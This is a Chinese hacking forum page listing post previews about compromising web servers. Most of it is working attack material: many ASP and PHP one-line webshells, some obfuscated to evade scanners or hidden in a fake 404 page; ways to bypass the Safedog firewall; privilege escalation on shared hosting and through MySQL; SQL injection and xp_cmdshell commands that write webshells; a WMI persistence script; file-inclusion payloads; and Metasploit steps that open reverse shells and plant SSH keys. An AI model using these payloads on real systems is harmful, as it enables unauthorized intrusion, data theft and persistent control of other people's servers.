cracer吧
关注: 8 贴子: 111

  • 目录:
  • 个人贴吧
  • 1
    那个 1 就是连接的时候的密码,连接的话 可以用一句话木马客服端连接 还有就是我们的菜刀 asp一句话 <%eval request("1")%> 或 <%execute(request("1"))%> <%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%> p 一句话加密: ┼攠數畣整爠煥敵瑳∨∣┩愾┼砧 密码 # 原文件 <% execute request("#")%>a<%'x php一句话 &l
  • 0
    安全狗,无所谓,反正现在有些突破安全狗的方法A.1. 上传一个 jpg的文件 内容为一句话2. 上传一个 1.asp文件 插入代码 <!- -#include =file = “jpg的文件” - ->然后就可以绕过安全狗解析了 B.还有一种上传1.asp;(1).jpg 建立1.asp;这样的目录 你懂的!!~!!!! 过安全狗建立;1.asp目录 突破安全狗的技术总汇 过安全狗主要过哪几方面: 1.过注入 2.过大马被阻拦访问 3.过菜刀连接一句话被拦截 4.过1.asp;.jpg这样的文件 其他我没遇到了。。 现在一点一点讲: 1.过注入
  • 0
    一:找可写目录 这个很关键的,星外的可写目录 其实吐司已经汇总了。不过星外最近又更新了,各位颤抖把。。。 C:\7i24.com\iissafe\log\ '旧的星外可写,可以执行, 但是新的星外要不就是可写但是不能执行。。 建议大家把cmd 后缀 修改为 src,txt,com执行,有时候反而能成功 其他的可写目录相信大家已经收集了,这里我就不多说了,其次 华众的主机 在注册表就可以秒杀的 找可写其实 除了星外,大家一般的都可以找到,而且temp 都可以执行成功. 二:
  • 0
    声明,这不是什么星外0DAY,这充其量只是一个在找不到可写可执行目录的一个提权思路。我不敢说是我最先发现的,可能有其他人也发现了,并且也在利用了。无数实例证明了lcx前辈那句话,细节决定成败。这只是入侵渗透中的细节问题,刚好我注意到了。下面正文开始。 众所周知要成功提权星外主机就要找到可写可执行目录,可近来星外主机的目录设置越来越BT,几乎没有可写可执行目录。另一个“提权思路”出现了。寻找服务器上安装的第3方软
  • 0
    星外笔记 - cracer微博 #cracer微博# 录制个提取服务器视频 其实服务器我已经拿下了 不过 有可看的地方 星外 找不到可读可写目录 提权服务器 拒绝访问。 星外提权就是找可读可写目录 才有可能找到可执行目录 上传了cmd了 之前 C:\windows\temp\Cookies\CMD.EXE 拒绝访问。 找遍了 目录没有找到可执行的目录 这个时候可以试这找 log日记 先说两个要点 这个是星外的服务器 一看就可以知道 d:\freehost\ 可以尝试星外默认帐号密码登录服务器 星外默认帐号密码 freehostru
  • 0
    华众虚拟主机提权 0x21如何识别华众主机 和星外识别差不多的方法,一般情况从目录就可以看出: 绝大部分情况是D:\hzhost\ 还有就是这种:e:\wwwroot\longzhihu\wwwroot\ 其他的判断方法就是看安装目录 C:\Program Files\ C:\Documents and Settings\All Users\「开始」菜单\程序 0x22敏感目录及注册表   就经验来说,一般是的溢出提权对虚拟主机是无果的,而且华众又没有星外那么明显的漏洞。   所以华众提权关键之处就是搜集信息!!! 主要注册表位置: HKEY_LOCAL_MACHI
  • 0
    0x40 N点虚拟主机提权 0x41识别N0x40 N点虚拟主机提权点虚拟主机 在下面两个目录中常有npointsoft这样的目录。 C:\Program Files\ C:\Documents and Settings\All Users\「开始」菜单\程序 在用户组信息当中有这样一栏: 目前国内大部分网站的现状是建立在各大虚拟主机系统上,独立服务器的站点是越来越少。 所以一旦获取主机的最高权限就能掌握大量的站点,而且虚拟主机又是那么变态,提权基本很难。于是本菜本着授人与鱼不如授人与渔为大家总结,并分享给大家
  • 0
    星外虚拟主机 可写目录跟帖汇集 最近貌似星外的讨论的很火,星外主要还是找有可写可执行权限的目录,新版本的星外要找这些目录基本上无望,我这里抛砖引玉希望各位共享更多目录。 C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ C:\php\PEAR\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\有的杀毒 防火墙目录有权限 C:\7i24.com\iissafe\log\ 不过新版本的貌似放到C:\windows\下了,并且我也没看到有iissafe文件夹了 C:\RECYCLER C:\windows\temp\ 看
  • 0
    0x30西部数码提权 0x31如何识别西部数码 一般是从安装目录就可以确定,安装目录d:\SOFT_PHP_PACKAGE\ 网站目录没有明显特点 还有就是通过 C:\Documents and Settings\All Users\「开始」菜单\程序 这个目录进行确认。 0x32存放敏感信息位置 虚拟主机默认软件安装路径:d:\SOFT_PHP_PACKAGE\ 在该目录下: setup.ini 配置文件中记录着mysql root 密码 site.xml 记录着网站配置信息(3.0以前) 3.0版本现在集成到了access数据库中 也是存放在 默认安装路径下的iistool.dat 文件中 用户权限
  • 0
    GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'china2010' WITH GRANT OPTION; 开启外联 create database 数据库名字 //创建数据库 use 数据库名字// 使用该数据库 show tables //查看该数据中的表
  • 0
    MYSQL提权新方法ROOT密码 记得 昨天在入侵一个网站PHP+MYSQL 主站没办法进去 旁吧! OK 那就旁 在日下了一个旁站 当然想到的是提权 仔细看了下 权限小得可怜 只有一个E:/MYSQL5 和网站目录[支持PHP] 可浏览 其他权限基本没有[可能我太菜 没找到] 实在没办法了` 想到原来做网站时候MY SQL 数据存储的过程!知道了` 于是进入E:/MYSQL5/DATA 这个文件里面 找到MYSQL 这个文件夹 把里面的USER 表[有3个] 把3个全部下载到本地 本地搭建PHP+MYSQL环境 装PHPMYADMIN 在本地MYSQL目录
  • 0
    Mysql root 提权 mstsc inc目录 conn.php config.php web.php 在安装目录下找user.MYD $dbhost = 'localhost'; // 数据库服务器 $dbuser = 'root'; // 数据库用户名 $dbpw = 'admin11'; // 数据库密码 $dbname = 'bbs'; // 数据库名 C:\Winnt\udf.dll 2000 C:\Windows\udf.dll 2003 E:\MySQL\MySQL Server 5.1\lib\plugin\udf.dll (5.0以上的要在数据库安装目录lib\plugin导出) c:\\path\\aa*** 查看有木有降权 select load_file('c:\\boot.ini') 查看 SHOW VARIABLES LIKE '%plugin%'; 现在基本上win的服务器就这两个导
  • 0
    #pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.ex
  • 0
    c#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.e
  • 0
    服务器过滤了asa,cer,cdx,htr,aspx,php,jsp 等脚本 突破的办法是什么呢?过滤常见脚本到底该如何突破? 这里我们还可以添加一个ashx 脚本类型。用ashx来写一个asp的一句话到当前目录。 代码如下。 <%@ WebHandler Language="C#"Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
  • 0
    近日碰带一个脱裤的环境: asp+mssql的环境,网站数据库分离的 想脱所有库里的内容 尝试多种脱裤的脚本,都有点差强人意 尝试ssql.asp(http://s*b.****.net/thread-6047-1-1.html) 虽然也行 但是库内容比较大,脚本每次执行的有大小限制,比如每次只能查询10000条语句, 就的分多次查询,但数据有几十万,这样执行也非常难受 后来发现命令行下有sqlcmd这个工具,可远程执行sql命令 于是尝试远程备份数据库,执行命令如下 sqlcmd -U cms -P qwe123!@# -S 192.168.10.10 -Q &quo
  • 0
    当页面提示“上传格式不正确[重新上传]”,说明存在上传漏洞,复制地址放到明小子里上传,一般都能成功拿下shell。 当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再上传即可突破拿下shell .登陆后台,点击修改密码---新密码设置为:1":eval request("h")’设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
  • 0
    mssql access 直接爆表.然后你懂的 BT5里面的话前面就要加python sqlmap.py -u url --dbs //爆数据库 sqlmap.py -u url --current-db //爆当前库 sqlmap.py -u url --current-user //爆当前用户 sqlmap.py -u url --users 查看用户权限 sqlmap.py -u url --tables -D 数据库 //爆表段 sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段 sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解 sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段 翻回来也可以 sqlmap.py -u url 判断 sqlmap.py -u url --is-d
  • 0
    Select substring(load_file(‘c:/windows/system32/inetsrv/MetaBase.xml’,1,4096); 发现是默认安装路径,估计tomcat也是默认路径,下载一个相同版本的tomcat到本地安装,看到默认路径为 C:\Program* Files\Apache Software* Foundation\Tomcat 7.0\ 那就方便了,select load_file(‘C:\\Program *Files\\Apache Software* Foundation\\Tomcat 7.0\\conf\\*tomcat-users.xml’) 来查看tomcat管理员密码。 找到了
  • 0
    unicode编码的access木马 本方法适用于access数据库,只要在access数据库任何地方插入: ┼攠數畣整爠煥敵瑳∨≡┩> 然后将mdb备份成asp或者asa。 访问这个asp或asa,就是一句话。 注:上面那串乱码,是<% execute request("a")%>的unicode 因为你直接插入< % execute request("a")%>,那么编码后没法执行。 有些地方过滤了%号或引号,用unicode编码的access木马就可以绕过了。
  • 0
    .禁忌这两个网站后台文件 admin_index.asp manage_login.asp 方法:1查看图片路径可能找到,2robots.txt,3修改了后台可能和网站域名有关比如:http://www.***.COM/admin 可能改成这样了http://www.***.COM/mysite_admin 或者http://www.***.COM/ms_admin 注意缩写mysite=ms ,4 google inurl: 查询 5.生成的帖子baidu.XML 貌似还记得dedecms还是某个系统生成的seo信息暴露过后台地址搞忘了,6和第3点相似可能用网站最底部的联系号码或者邮箱加上admin,当然这种很少不过也遇到过此电话可能是后台密码
  • 0
    如何找到目标站目录 1. 没有权限 通过爆路径, 找网站目录 a. 一些常见phpweb程序都有爆路径的洞 b. phpmyadmin爆路径 c .phpinfo.php等测试网站脚本运行正常的脚本 d. fck编辑器爆绝对路径: FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux shell权限 Windows:c:\windows\php.ini php配置文件 c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件 C:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ServUDaemon.ini 中存储了虚拟
  • 0
    asp免杀一句话<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%> 复制代码穿透防火墙的bs小马 服务器装有 8Signs Firewall 防火墙的,PHP、ASP、ASPX 很多小马大马都不能用,所以这里推荐用BS 的马。。。 小马的接收端: -------------------------------------- <% On Error Resume Next set gl=server.CreateObJeCt("Adodb.Stream") gl.Open gl.Type=2 gl.CharSet="gb2312" gl.writetext request("code") gl.SaveToFile server.mappath(request("path")),2 gl.Close set gl=not
  • 0
    select '1' into outfile 'E:\2.txt' 会提示 [Type] 查询语句安全威胁 [Query] select '1' into outfile 'E:\2.txt' 为什么会这样呢? \config\config_global.php中 限制了into outfile函数 尝试绕过 /*!select*/ '1' /*!into outfile*/ 'E:\3.txt' Discuz! 数据结构升级成功,影响的记录行数 1 如果要导出一句话,即 /*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php' 注意:一句话密码不要有引号
  • 1
    我刚在FUCK发的。。 有时提权后 用adduser会出现 adduser: command not found 用su -解决 下面网上找的资料 为什么useradd命令不能用? 理解这个问题以前需要先理解环境变量的概念。 在UNIX系统里面,每个系统用户都有自己的环境变量来定义自己登陆上来的的SHELL,终端类型,路径等等, 在LINUX下,BSHELL的用户登陆后会执行主目录下的.bash_profile文件, CSHELL的用户会执行.cshrc_profile文件,这些文件里定义了你这个用户的环境变量。 出现这个问题,有可能是以普通
  • 0
    通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell. Type of call: require($file); Exploit: http://www.***.net/?file=/etc/passwd Type of call: require(“includes/”.$file); Exploit: http://www.***.net/?file=../../../../../etc/passwd Tpye of calls: require(“languages/”.$lang.”.php”); require(“themes/”.$theme.”/config.php”); Exploit: http://www.***.net/?file=../../../../../etc/passwd%00 Type of call: require(“languages/”.$_COOKIE['lang'].”.php”); Exploit: javascript:docume
  • 0
    (一)对某CMS的初步安检1.初步查看某日,在安天365群里,KISS发过来一个网址,让我友情检测一下该网站的安全,于是打开此网站,如图1所示,感觉人情还不错,界面也比较简洁。 图1 网站页面 2.简单的安全测试打开网站一看原来是个校友录,随便找个带参数的地方,加个单引号,http://www.*********.com/gg.asp?id=100',返回的结果如图2所示。 图2 过滤单引号 很明显,程序作了防注入的处理,看来程序开发者安全意识,还是做了一些安全措施,不过后来
  • 0
    一枚隐蔽的PHP一句话木马 一句话木马, PHP一句话, 木马 本帖隐藏的内容需要回复才可以浏览 代码:<?php $_GET[a]($_GET[b]);?> 复制代码仅用GET函数就构成了木马; 利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; 复制代码执行后当前目录生成c.php一句话木马 (PS:当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马) 注:本木马隐蔽性极强,直接无视查马工具(谁会把GET当做PH
  • 0
    PHP 404页面的一句话把一句话搞隐蔽点,搞个404页面。 然后采用核心代码@preg_replace(“/[checksql]/e”,$_POST['date'],”saft”); 这样可以有效的防止暴力破解还达到免杀的效果。 [img]http://***.org/index.php?action=dlattach;topic=101.0;attach=98[/img] 404一句话代码: view sourceprint? <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /error.php was not found on this serv
  • 0
    用^转义字符来写ASP(一句话木马)文件的方法: 1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- 2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp PHP echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php
  • 0
    asp一句话木马 程序代码 <%eval request("CrAcK8")%> 程序代码 <%execute request("CrAcK8")%> 程序代码 <%execute(request("CrAcK8"))%> 程序代码 <%execute request("CrAcK8")%><%'<% loop <%:%> 程序代码 <%'<% loop <%:%><%execute request("CrAcK8")%> 程序代码 <%execute request("CrAcK8")'<% loop <%:%>[code] [code]<script language=vbs runat=server>eval(request("CrAcK8"))</script> 程序代码 %><%Eval(Request(chr(35
  • 0
    〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉 一句话:<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%> 一句话大全 以下这个ASP一句话 <%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%> <?php ($_=@$_GET[2]).@$_($_POST[1])?> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!因为加了判断! 加了判断的PHP一句话,与上面的ASP一
  • 0
    注意闭合 在网址栏输入:http://"%><%execute(request("n"))%><%' 在系统配置(上面)的公司中文名称里插入"%><%eval request("a")%><%s=" 之后连接/Config/config.asp,密码 a OK~
  • 0
    在公司地址后面加上 "%><%BBBB=request("aaaa")%><%eval(BBBB)%><%' 配置文件地址已经给出来了../include/vars.asp
  • 0
    unicode编码的access木马 本方法适用于access数据库,只要在access数据库任何地方插入: ┼攠數畣整爠煥敵瑳∨≡┩> 然后将mdb备份成asp或者asa。 访问这个asp或asa,就是一句话。 注:上面那串乱码,是<% execute request("a")%>的unicode 因为你直接插入< % execute request("a")%>,那么编码后没法执行。 有些地方过滤了%号或引号,用unicode编码的access木马就可以绕过了。
  • 0
    一些一句话变型 <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?> <script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script> <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?> <script language="php"> fputs (fopen(pack(&qu
  • 0
    程序员在网站后台过滤插一句话的时候往往都是以“<?,?>”这两个关键字进行替换或过滤的!所以这种标签在后台插马的时候用处还是很大的! PS:就是应为使用量不大,就不重视!这样能行吗? 实战:114啦导航 准备我们的一句话代码:利用script的标签 代码: <script language="php">eval ($_POST[1]);</script> 首先后台我跟晴天那家伙已经看完了。他自己的方法也没拿下shell 模版目录权限是只读!你们懂的! 这里的方法就是利用缓存拿shell 这
  • 0
    SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a 会在C盘生成一个名为x.asp;a.xls的文件。
  • 0
    win10下右键图片,在属性->详细信息->版权内插入一句话即可。
  • 0
    关于最近那个网马0day(CVE-2010-0806)用Metasploit生成方法 一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb 二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb 三、启动msfconsole 四、msf > use exploit/test/ie msf exploit(ie) > show optinos 回显: Module options: Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SS
  • 0
    首先下载sqlmap gui BT工具 sqlmapGUI.tar root@bt:~# ls Desktop Firefox-latest.tar.bz2 sqlmapGUI.tar firefox linuxqq_v1.0.2-beta1_i386.deb root@bt:~# tar vxf sqlmapGUI.tar sqlmapGUI/ sqlmapGUI/sqm.pyw sqlmapGUI/pyttk-0.3-py3k/ sqlmapGUI/pyttk-0.3-py3k/ttk.pyc sqlmapGUI/pyttk-0.3-py3k/build/ sqlmapGUI/pyttk-0.3-py3k/build/lib.linux-i686-2.6/ sqlmapGUI/pyttk-0.3-py3k/build/lib.linux-i686-2.6/ttk.py sqlmapGUI/pyttk-0.3-py3k/setup.py sqlmapGUI/pyttk-0.3-py3k/README sqlmapGUI/pyttk-0.3-py3k/test/ sqlmapGUI/pyttk-0.3-py3k/test/test_extensions.py sqlmapGUI/pyttk-0.3-py3k/test/runtests.py sqlmapGU
  • 0
    metasploit 常用命令备忘 MSFconsole Commands ------------------------------------- 24 show exploits 查看所有exploit show payloads 查看所有payload show auxiliary 查看所有auxiliary search name 搜索exploit 等 info 查看加载模块的信息 use name 加载模块 LHOST 本机IP RHOST 目标IP set function 设置选项值 setg function 全局设置 show options 查看选项 show targets 查看exp 可选的平台 set target num 设置exp 作用平台 set payload payload 设置payload show advanced 查看高级选项 set autorunscript migrate -f 设置自动执行指令 check 测
  • 0
    nmap -O -sV 192.168.0.254 139 samba smbd 3.x 445 smbclient -L \\192.168.0.254 -N search samba use exploit/freebsd/samba/transzopen set RHOST 192.168.0.254 set LHOST 192.168.0.175 set LPORT 28 exploit smbclient -L \\192.168.0.254 use auxiliary/admin/smb/samba_symlink_traversal set RHOST 192.168.0.254 set SMBSHARE tmp exploit smbclient //192.168.0.254/tmp use exploit/mutil/samba/usermap_script set RHOST 192.168.0.254 set payload cmd/unix/bind_netcat set LPORT 28 exploit
  • 0
    netdiscover -r 192.168.0.1/24 nmap -Pn -p1-65535 192.168.0.254 8787 ruby search drb use exploit/linux/misc/drb_remote_codeexec set URL druby:192.168.0.254:8787 set payload cmd/unix/reverse exploits
  • 0
    root@bt:~# sshd-generate root@bt:~# /etc/init.d/ssh start root@bt:~# netstat -an
  • 0
    VM如果启动不了BT5 R2的话将下面保存 批处理 1.bat 内容如下: net start vmci NET START VMNETUSERIF NET START VMNETBRIDGE net start vmci net start vmx86 net start VMnetuserif sc config vmci=auto sc config vmx86=auto sc config VMnetuserif=auto 2.确保物理机的服务里面 VM dhcp 服务和 VM NAT 服务启动好了没有启动的话自己去启动下 3.VM虚拟机上网方式选择 NAT 4. loginin:root 密码toor startx 运行进入BT5图形界面后 终端输入 dhclient 即可上网 测试1:VM装BT5 R2上网 桥接 打开 BT 应用程序 互联网 --wicd network manager
  • 0
    2007-01-23 13:21 升级openSSH的小问题 1。) 使用openssh-4.5p1和zlib-1.2.3升级到OpenSSH_4.5p1,出现错误: configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) *** 解决方法:安装openssl-devel-0.9.7a-43.14及其依赖包:krb5-devel-1.3.6-7、zlib-devel-1.2.1.2、e2fsprogs-1.35-12.4.EL4 2。)安装好openssl-devel又出现错误: configure: error: PAM headers not found 解决方法:安装pam-devel-0.77-66.17
  • 0
    nmap -sS -sV -O 192.68.0.175 msfconsole search tomcat use scanner/http/tomcat_mgr_login set RHOSTS 192.168.0.175 setg RPHOST 8080 set user_file /root/desktop/user.lst set pass_file /root/desktop/pass.lst search tomcat user multi/http/tomcat_mgr_deploy set RHOST 192.168.0.175 set USERNAME admin set PASSWORD admin set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.0.3 exploit 获取 meterpreter 本机 cd /root/.ssh/ ls rm -rf authorized_keys rm -rf id_rsa rm -rf id_rsa.pub ssh-keygen -t rsa mkdir /root/.ssh/ cd /root/.ssh/ lcd /root/.ssh upload authorized_keys ssh root@192.168.0.175

  • 发贴红色标题
  • 显示红名
  • 签到六倍经验

赠送补签卡1张,获得[经验书购买权]

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!

本吧信息 查看详情>>

会员: 会员

目录: 个人贴吧

友情贴吧